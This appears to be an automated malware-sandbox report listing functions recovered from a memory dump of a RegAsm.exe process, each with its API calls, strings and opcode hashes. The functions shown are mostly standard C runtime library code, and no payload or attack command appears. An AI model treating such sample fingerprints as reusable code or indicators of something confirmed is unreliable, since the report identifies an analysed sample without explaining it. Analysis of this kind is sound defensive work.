Function 0041E79A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041EA78,00000001,45F1B473,?,-00000050,?,0041EE1A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7E4

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction ID: 0c0c1f316863ef4a6d30beb722119c93d5a9d1266b3f20af8045389666d513f6
Opcode Fuzzy Hash: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction Fuzzy Hash: BDF0C23A2003045FEB249F3A9881ABABB95FF80368F15442EFD568B690D6759C82C718

Function 00414138 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0C6: EnterCriticalSection.KERNEL32(?,?,00412EDC,00000000,00432B68,0000000C,00412EA3,0000000C,?,004140C7,0000000C,?,004152D9,00000001,00000364,?), ref: 0040E0D5

EnumSystemLocalesW.KERNEL32(0041412B,00000001,00432BE8,0000000C,0041455A,00000000), ref: 00414170

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction ID: 198ab3507c4040aae18c9164df511e00e81c972c753b4360ebc7eca8a0771405
Opcode Fuzzy Hash: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction Fuzzy Hash: 14F03C72A14204DFD710EF99E842B9C77B0FB84725F10422BE811DB2A0C7B959409B98

Function 0041E6B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E60D,00000001,45F1B473,?,?,0041EE78,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6EB

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction ID: d7e3b5c502124c080ac9a43a58f0728b4bb26e435a168ea3e401fe3e83efba30
Opcode Fuzzy Hash: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction Fuzzy Hash: A9F0E53A30025597CB149F3AD8557AABF94EFD1724F87405AEE06CB250C6799883C758

Function 0041465E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A47,?,20001004,00000000,00000002,?,?,00412049), ref: 00414692

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: f9bd5592f4a27906ba0b7000611c056f456b6c13901b9127fc06cc884ae94f8f
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: 63E04F31540268BBCF122F61DC04EEE3F19FF85761F064026FC1566261CB7A9D61AA9D

Function 00407C63 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C6F,00407287), ref: 00407C68

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction ID: 0ff61591fe6e7fdbf664e27eab8a47433d3f920744837751a1e33914f5cec1be
Opcode Fuzzy Hash: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction Fuzzy Hash:

Function 0041EFD8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFD8

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 0041914C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction ID: ed00e364353b2709b8c4936f7de79ec0fff9d1aa87bc6e08b7c0caa285f9e44e
Opcode Fuzzy Hash: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction Fuzzy Hash: 73E04632911268EBCB18DB89C95898AB2ACEB44B04B15009AF902D3210C274DE80C7D4

Function 004114A6 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction ID: 9d670eee6a7ff43784672fcc557034ad53df9d6dcb31fc26035e34de67efaf71
Opcode Fuzzy Hash: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction Fuzzy Hash: 6EC08C3420098046CF29CE10C2713EA33D5A392B82F80098ECA0A0F752CA1E9CC2DA44

Function 00404B20 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
__Getctype.LIBCPMT ref: 00404C96
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
std::_Facet_Register.LIBCPMT ref: 00404D7E

Strings

bad locale name, xrefs: 00404D98

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
Opcode Fuzzy Hash: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A

Function 0040A998 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
_UnwindNestedFrames.LIBCMT ref: 0040AD17
CallUnexpected.LIBVCRUNTIME ref: 0040AD32

Strings

csm, xrefs: 0040A9D5
csm, xrefs: 0040AA42
csm, xrefs: 0040AAEE
hqB, xrefs: 0040AAAE

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A

Function 00422D42 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B

Strings

asin, xrefs: 00422E88
acos, xrefs: 00422E91
exp, xrefs: 00422DDA, 00422E3F
pow, xrefs: 00422DF9, 00422EA3, 00422EF0
log, xrefs: 00422DB8, 00422DC7
sqrt, xrefs: 00422E9A
log10, xrefs: 00422D9D, 00422DAC

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E

Function 0040718A Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0

Strings

GetTempPath2W, xrefs: 004071B5
GetSystemTimePreciseAsFileTime, xrefs: 004071A4
GetCurrentPackageId, xrefs: 00407198
kernel32.dll, xrefs: 0040718B

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424323 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0160CBE8,0160CBE8,?,7FFFFFFF,?,004245F3,0160CBE8,0160CBE8,?,0160CBE8,?,?,?,?,0160CBE8,?), ref: 004243C9
__alloca_probe_16.LIBCMT ref: 00424484
__alloca_probe_16.LIBCMT ref: 00424513
__freea.LIBCMT ref: 0042455E
__freea.LIBCMT ref: 00424564
__freea.LIBCMT ref: 0042459A
__freea.LIBCMT ref: 004245A0
__freea.LIBCMT ref: 004245B0

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9

Function 00414301 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,3037F390,?,0041440E,004038E3,?,?,00000000), ref: 004143C2

Strings

ext-ms-, xrefs: 0041436C
api-ms-, xrefs: 00414358

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8

Function 00422232 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69

Function 0040A62A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D

Function 004114C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3037F390,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531

Strings

mscoree.dll, xrefs: 004114F6
CorExitProcess, xrefs: 00411507

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58

Function 00418EB1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F38
__alloca_probe_16.LIBCMT ref: 00418FF9
__freea.LIBCMT ref: 00419060

Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458

__freea.LIBCMT ref: 00419075
__freea.LIBCMT ref: 00419085

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9

Function 00405A29 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A30
std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A74
std::_Facet_Register.LIBCPMT ref: 00405A8B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction ID: b96a9e16e5313ba5d76a5da041c455aafda494eca7322fa8897946df384a052d
Opcode Fuzzy Hash: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction Fuzzy Hash: 7C01AD75A00A168BCB05EB65C881AAF7771EF84354F24052EE414BB3D2CB3CAE058F99

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::failbit set, xrefs: 00401E62, 00401F41
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::eofbit set, xrefs: 00401F46

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
Opcode Fuzzy Hash: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9

Function 00407420 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
___raise_securityfailure.LIBCMT ref: 00407E90

Strings

@SC, xrefs: 00407E8B
#7@, xrefs: 00407E13

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: #7@$@SC
API String ID: 3761405300-54278199
Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E

Function 0040B772 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1

Strings

api-ms-, xrefs: 0040B796

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC

Function 004164C2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(3037F390,00000000,00000000,0040BDB8), ref: 00416525

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
GetLastError.KERNEL32 ref: 0041686B

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58

Function 0040A741 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A808
___AdjustPointer.LIBCMT ref: 0040A82B
___AdjustPointer.LIBCMT ref: 0040A8C7

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A

Function 0041B4A7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

GetLastError.KERNEL32 ref: 0041B50B
__dosmaperr.LIBCMT ref: 0041B512
GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
__dosmaperr.LIBCMT ref: 0041B553

Memory Dump Source

Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
